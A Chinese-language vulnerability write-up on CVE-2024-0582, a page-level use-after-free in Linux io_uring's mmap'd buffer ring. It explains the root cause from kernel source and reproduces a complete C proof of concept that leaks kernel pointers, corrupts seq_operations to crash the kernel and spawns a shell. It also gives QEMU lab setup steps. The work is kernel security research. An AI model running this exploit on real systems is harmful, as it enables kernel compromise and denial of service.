CVE-2024-0582 是 Linux Kernel 的高性能异步 IO API —— io_uring 中的一个漏洞:使用 IORING_REGISTER_PBUF_RING 注册、并通过 mmap() 映射到用户态的 ring buffer,在被注销释放后仍然可以经由该映射继续访问,从而形成 UAF,攻击者可以通过该漏洞攻击内核并完成内核提权;该漏洞的 CVSS 分数为 7.8,影响版本包括但不限于 6.4~6.6.5,本文我们选用 6.4 的版本内核源码进行分析。
漏洞分析 PBUF_RING Internal 我们这里主要关注 io_uring_register 函数中 switch 中与 PBUF_RING 相关的部分
注册:IORING_REGISTER_PBUF_RING 对于这个漏洞我们主要关注当 opcode == IORING_REGISTER_PBUF_RING 的情况,该 opcode 意味着注册一个环形缓冲区,其最终会调用到 io_register_pbuf_ring() 函数:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 int io_register_pbuf_ring (struct io_ring_ctx *ctx, void __user *arg) { struct io_uring_buf_reg reg ; struct io_buffer_list *bl , *free_bl = NULL ; int ret; if (copy_from_user(&reg, arg, sizeof (reg))) return -EFAULT; if (reg.resv[0 ] || reg.resv[1 ] || reg.resv[2 ]) return -EINVAL; if (reg.flags & ~IOU_PBUF_RING_MMAP) return -EINVAL; if (!(reg.flags & IOU_PBUF_RING_MMAP)) { if (!reg.ring_addr) return -EFAULT; if (reg.ring_addr & ~PAGE_MASK) return -EINVAL; } else { if (reg.ring_addr) return -EINVAL; } if (!is_power_of_2(reg.ring_entries)) return -EINVAL; if (reg.ring_entries >= 65536 ) return -EINVAL; if (unlikely(reg.bgid < BGID_ARRAY && !ctx->io_bl)) { int ret = io_init_bl_list(ctx); if (ret) return ret; } bl = io_buffer_get_list(ctx, reg.bgid); if (bl) { if (bl->is_mapped || !list_empty(&bl->buf_list)) return -EEXIST; } else { free_bl = bl = kzalloc(sizeof (*bl), GFP_KERNEL); if (!bl) return -ENOMEM; } if (!(reg.flags & IOU_PBUF_RING_MMAP)) ret = io_pin_pbuf_ring(&reg, bl); else ret = io_alloc_pbuf_ring(&reg, bl); if (!ret) { bl->nr_entries = reg.ring_entries; bl->mask = reg.ring_entries - 1 ; io_buffer_add_list(ctx, bl, reg.bgid); return 0 ; } kfree(free_bl); return ret; }
这里需要关注:存在 IOU_PBUF_RING_MMAP 标志时会调用 io_alloc_pbuf_ring 函数,由内核分配连续页面;否则调用 io_pin_pbuf_ring 函数将用户态页面 pin 到 ring 上(当 io_buffer_get_list 获取到的 bl 为空时,会先用 kzalloc 分配一个新的 io_buffer_list,再进行上述分配)。IOU_PBUF_RING_MMAP 标志表示由内核分配环形缓冲区的内存,之后用户态应用使用 mmap() 映射来访问。继续查看 io_alloc_pbuf_ring() 函数,可以看到其调用 __get_free_pages 来分配页面,flag 中包含 GFP_KERNEL_ACCOUNT :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 unsigned long __get_free_pages(gfp_t gfp_mask, unsigned int order){ struct page *page ; page = alloc_pages(gfp_mask & ~__GFP_HIGHMEM, order); if (!page) return 0 ; return (unsigned long ) page_address(page); } EXPORT_SYMBOL(__get_free_pages); static int io_alloc_pbuf_ring (struct io_uring_buf_reg *reg, struct io_buffer_list *bl) { gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP; size_t ring_size; void *ptr; ring_size = reg->ring_entries * sizeof (struct io_uring_buf_ring); ptr = (void *) __get_free_pages(gfp, get_order(ring_size)); if (!ptr) return -ENOMEM; bl->buf_ring = ptr; bl->is_mapped = 1 ; bl->is_mmap = 1 ; return 0 ; }
分配的结构体为 io_uring_buf_ring ,其定义如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 struct io_uring_buf_ring { union { struct { __u64 resv1; __u32 resv2; __u16 resv3; __u16 tail; }; __DECLARE_FLEX_ARRAY(struct io_uring_buf, bufs); }; };
图示:
注销:IORING_UNREGISTER_PBUF_RING 注销 PBUF_RING 对应的操作为 IORING_UNREGISTER_PBUF_RING ,内核会调用到 io_unregister_pbuf_ring 进行处理
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 int io_unregister_pbuf_ring (struct io_ring_ctx *ctx, void __user *arg) { struct io_uring_buf_reg reg ; struct io_buffer_list *bl ; if (copy_from_user(&reg, arg, sizeof (reg))) return -EFAULT; if (reg.resv[0 ] || reg.resv[1 ] || reg.resv[2 ]) return -EINVAL; if (reg.flags) return -EINVAL; bl = io_buffer_get_list(ctx, reg.bgid); if (!bl) return -ENOENT; if (!bl->is_mapped) return -EINVAL; __io_remove_buffers(ctx, bl, -1U ); if (bl->bgid >= BGID_ARRAY) { xa_erase(&ctx->io_bl_xa, bl->bgid); kfree(bl); } return 0 ; }
首先通过 __io_remove_buffers 函数释放 bl->buf_ring 对应的页面;随后若 bgid >= BGID_ARRAY,则使用 xa_erase 函数移除该 io_buffer_list 并用 kfree 将其释放。 __io_remove_buffers 函数定义如下,由于在 alloc 时指定了 is_mapped = 1、is_mmap = 1,因此会走以下路径:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 static int __io_remove_buffers(struct io_ring_ctx *ctx, struct io_buffer_list *bl, unsigned nbufs) { unsigned i = 0 ; if (!nbufs) return 0 ; if (bl->is_mapped) { i = bl->buf_ring->tail - bl->head; if (bl->is_mmap) { struct page *page ; page = virt_to_head_page(bl->buf_ring); if (put_page_testzero(page)) free_compound_page(page); bl->buf_ring = NULL ; bl->is_mmap = 0 ; } else if { ... } INIT_LIST_HEAD(&bl->buf_list); bl->is_mapped = 0 ; return i; } ... }
使用:io_uring_mmap 可以通过 mmap() 对 io_uring 的 fd 进行映射,内核最终会调用到 io_uring_mmap() 函数:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 static __cold int io_uring_mmap (struct file *file, struct vm_area_struct *vma) { size_t sz = vma->vm_end - vma->vm_start; unsigned long pfn; void *ptr; ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz); if (IS_ERR(ptr)) return PTR_ERR(ptr); pfn = virt_to_phys(ptr) >> PAGE_SHIFT; return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot); } static const struct file_operations io_uring_fops = { .release = io_uring_release, .mmap = io_uring_mmap,
继续查看 io_uring_validate_mmap_request 函数内容,可以发现对于 IORING_OFF_PBUF_RING 的映射请求,所使用的指针是根据 bgid 从 ctx 中取得的 bl 的 buf_ring:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 void *io_pbuf_get_address (struct io_ring_ctx *ctx, unsigned long bgid) { struct io_buffer_list *bl ; bl = io_buffer_get_list(ctx, bgid); if (!bl || !bl->is_mmap) return NULL ; return bl->buf_ring; } static void *io_uring_validate_mmap_request (struct file *file, loff_t pgoff, size_t sz) { struct io_ring_ctx *ctx = file->private_data; loff_t offset = pgoff << PAGE_SHIFT; struct page *page ; void *ptr; switch (offset & IORING_OFF_MMAP_MASK) { case IORING_OFF_SQ_RING: case IORING_OFF_CQ_RING: ptr = ctx->rings; break ; case IORING_OFF_SQES: ptr = ctx->sq_sqes; break ; case IORING_OFF_PBUF_RING: { unsigned int bgid; bgid = (offset & ~IORING_OFF_MMAP_MASK) >> IORING_OFF_PBUF_SHIFT; mutex_lock(&ctx->uring_lock); ptr = io_pbuf_get_address(ctx, bgid); mutex_unlock(&ctx->uring_lock); if (!ptr) return ERR_PTR(-EINVAL); break ; } default : return ERR_PTR(-EINVAL); } page = virt_to_head_page(ptr); if (sz > page_size(page)) return ERR_PTR(-EINVAL); return ptr; }
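漏洞成因 当我们将 bl->buf_ring 的内存通过 mmap() 映射出去后,仍然可以通过 io_unregister_pbuf_ring 函数将这块内存释放掉:io_uring_mmap 使用 remap_pfn_range 建立映射,这一过程并不会增加页面的引用计数,因此注销时 put_page_testzero 会直接将页面释放,而用户态的映射依然有效。于是可以先进行内存分配,再 mmap,最后再释放这块内存,就直接得到一个页级的 UAF:可以通过 mmap 的内存区域直接读写已经释放掉的内存页。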
POC 这里直接 copy 了 a3 的 poc:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <sched.h> #include <liburing.h> #include <sys/mman.h> #include <sys/user.h> #ifndef IS_ERR #define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL) #endif #ifndef PTR_ERR #define PTR_ERR(ptr) ((int) (intptr_t) ptr) #endif #define SUCCESSS_MSG(msg) "\033[32m\033[1m" msg "\033[0m" #define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m" #define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m" void bind_core (int core) { cpu_set_t cpu_set; CPU_ZERO(&cpu_set); CPU_SET(core, &cpu_set); sched_setaffinity(getpid(), sizeof (cpu_set), &cpu_set); printf (INFO_MSG("[*] Process binded to core: " ) "%d\n" , core); } struct io_uring_buf_ring*setup_pbuf_ring_mmap (struct io_uring *ring, unsigned int ring_entries, int bgid, unsigned int flags, int *retp) { struct io_uring_buf_ring *buf_ring ; struct io_uring_buf_reg buf_reg ; size_t ring_size; off_t offset; int ret; memset (&buf_reg, 0 , sizeof (buf_reg)); buf_reg.ring_entries = ring_entries; buf_reg.bgid = bgid; buf_reg.flags = IOU_PBUF_RING_MMAP; ret = io_uring_register_buf_ring(ring, &buf_reg, flags); if (ret) { puts (ERR_MSG("[x] Error occur while doing 
io_uring_register_buf_ring" )); *retp = ret; return NULL ; } offset = IORING_OFF_PBUF_RING | (uint64_t ) bgid << IORING_OFF_PBUF_SHIFT; ring_size = ring_entries * sizeof (struct io_uring_buf); buf_ring = mmap( NULL , ring_size, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE, ring->ring_fd, offset ); if (IS_ERR(buf_ring)) { puts (ERR_MSG("[x] Error occur while doing mmap() for io_uring" )); *retp = PTR_ERR(buf_ring); return NULL ; } *retp = 0 ; return buf_ring; } #define NR_PAGES 1 #define NR_BUFFERS 0x100 #define SEQ_FILE_NR 0x200 void proof_of_concept (void ) { struct io_uring ring ; void **buffers; int seq_fd[SEQ_FILE_NR], found = 0 ; int ret; puts (SUCCESSS_MSG("-------- CVE-2024-0582 Proof-of-concet --------" )); puts (INFO_MSG("-------\t\t Author: " ) "arttnba3" INFO_MSG(" \t-------" )); puts (SUCCESSS_MSG("-----------------------------------------------\n" )); puts ("[*] Preparing..." ); bind_core(0 ); if (io_uring_queue_init(4 , &ring, 0 ) < 0 ) { perror(ERR_MSG("[x] Unable to init for io_uring queue" )); exit (EXIT_FAILURE); } puts ("[*] Allocating pbuf ring and doing mmap()..." ); buffers = calloc (NR_BUFFERS, sizeof (void *)); for (int i = 0 ; i < NR_BUFFERS; i++) { buffers[i] = setup_pbuf_ring_mmap( &ring, NR_PAGES * PAGE_SIZE / sizeof (struct io_uring_buf), i, 0 , &ret ); if (ret) { printf ( ERR_MSG("[x] Unable to set up" ) " No.%d " ERR_MSG("pbuf ring, error code: " ) "%d\n" , i, ret ); exit (EXIT_FAILURE); } io_uring_buf_ring_init(buffers[i]); } puts ("[*] Triggering page-level UAF vulnerabilities..." ); for (int i = 0 ; i < NR_BUFFERS; i++) { ret = io_uring_unregister_buf_ring(&ring, i); if (ret) { printf ( ERR_MSG("[x] Unable to unregister" ) " No.%d " ERR_MSG("pbuf ring, error code: " ) "%d\n" , i, ret ); exit (EXIT_FAILURE); } } puts ("[*] Reallocating page into seq_file::seq_operations..." 
); for (int i = 0 ; i < SEQ_FILE_NR; i++) { if ((seq_fd[i] = open("/proc/self/stat" , O_RDONLY)) < 0 ) { printf ( ERR_MSG("[x] Unable to open" ) " No.%d " ERR_MSG("seq file, error code: " ) "%d\n" , i, seq_fd[i] ); exit (EXIT_FAILURE); } } puts ("[*] Checking data leak and overwriting..." ); for (int i = 0 ; i < NR_BUFFERS; i++) { uint64_t *buffer = buffers[i]; for (int j = 0 ; j < (NR_PAGES * PAGE_SIZE / sizeof (uint64_t )); j++) { if (buffer[j]>0xffffffff80000000 && buffer[j]<0xfffffffff0000000 ) { printf ( SUCCESSS_MSG("[+] Got kernel data leak:" ) " %lx " SUCCESSS_MSG("at location " ) "%d-%d\n" , buffer[j], i, j ); buffer[j] = *(uint64_t *) "arttnba3" ; found = 1 ; goto out; } } } if (!found) { puts (ERR_MSG("[x] Failed to reallocate UAF page as seq_operations!" )); exit (EXIT_FAILURE); } out: puts ("[*] Triggering kernel panic..." ); sleep(1 ); for (int i = 0 ; i < SEQ_FILE_NR; i++) { char buf[0x1000 ]; read(seq_fd[i], buf, 1 ); } puts ("[?] So you're still alive here!?" ); system("/bin/sh" ); } int main (int argc, char **argv, char **envp) { proof_of_concept(); return 0 ; }
漏洞复现 这里我们选择 linux-6.4.16 内核源码进行编译
1 2 3 4 5 6 wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v6.x/linux-6.4.16.tar.xz unxz linux-6.4.16.tar.xz # choose config, all default is good make menuconfig
编译过程中可能会遇到一个与证书功能相关的报错,解决方法可参考:https://blog.csdn.net/m0_47696151/article/details/121574718 另外 gcc 版本不要太新(arch 复现环境的痛 XD,在服务器上 gcc 11.1 可以成功编译)
使用 busybox 来搭建基本文件系统
1 2 3 4 5 6 7 8 wget https://busybox.net/downloads/busybox-1.36.0.tar.bz2 tar -jxvf busybox-1.36.0.tar.bz2 # `Settings` ---> `Build static binary file (no shared lib)` to compile static busybox # 可选项:在 Linux System Utilities 中取消选中 Support mounting NFS file systems on Linux <2.6.23 (NEW);在 Networking Utilities 中取消选中 inetd。 make menuconfig make -j$(nproc) make install
配置文件系统,在编译生成的 _install 目录下创建基本的文件系统结构
配置文件系统:我们首先在 _install 目录下创建基本的文件系统结构:
1 2 3 4 5 6 cd _install mkdir -pv {bin,sbin,etc,proc,sys,dev,home/ctf,root,tmp,lib64,lib/x86_64-linux-gnu,usr/{bin,sbin}} touch etc/inittab mkdir etc/init.d touch etc/init.d/rcS chmod +x ./etc/init.d/rcS
在我们创建的 ./etc/inittab 中写入如下内容:
1 2 3 4 5 6 ::sysinit:/etc/init.d/rcS ::askfirst:/bin/login ::ctrlaltdel:/sbin/reboot ::shutdown:/sbin/swapoff -a ::shutdown:/bin/umount -a -r ::restart:/sbin/init
在上面的文件中指定了系统初始化脚本为 etc/init.d/rcS,因此接下来我们配置这个文件写入如下内容,主要是挂载各种文件系统,以及设置各目录的权限,并创建一个非特权用户:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 # !/bin/sh chown -R root:root / chmod 700 /root chown -R ctf:ctf /home/ctf mount -t proc none /proc mount -t sysfs none /sys mount -t tmpfs tmpfs /tmp mkdir /dev/pts mount -t devpts devpts /dev/pts echo 1 > /proc/sys/kernel/dmesg_restrict echo 1 > /proc/sys/kernel/kptr_restrict echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n" cd /home/ctf su ctf -c sh poweroff -d 0 -f
`
然后为这个脚本添加可执行权限,该脚本通常用作我们自定义的环境初始化脚本:chmod +x ./etc/init.d/rcS
接下来我们配置用户组相关权限,在这里建立了两个用户组 root 和 ctf ,以及两个用户 root 和 ctf,并配置了一条文件系统挂载项:
1 2 3 4 5 echo "root:x:0:0:root:/root:/bin/sh" > etc/passwd echo "ctf:x:1000:1000:ctf:/home/ctf:/bin/sh" >> etc/passwd echo "root:x:0:" > etc/group echo "ctf:x:1000:" >> etc/group echo "none /dev/pts devpts gid=5,mode=620 0 0" > etc/fstab
打包文件系统 按 cpio 格式打包即可,最后设置启动脚本如下:
1 2 3 4 5 6 7 8 9 10 11 12 # !/bin/sh qemu-system-x86_64 \ -m 128M \ -kernel ./bzImage \ -initrd ./rootfs.cpio \ -monitor /dev/null \ -append "root=/dev/ram rdinit=/sbin/init console=ttyS0 oops=panic panic=1 loglevel=3 quiet kaslr" \ -cpu kvm64,+smep \ -smp cores=2,threads=1 \ -nographic \ -snapshot \ -s
参考链接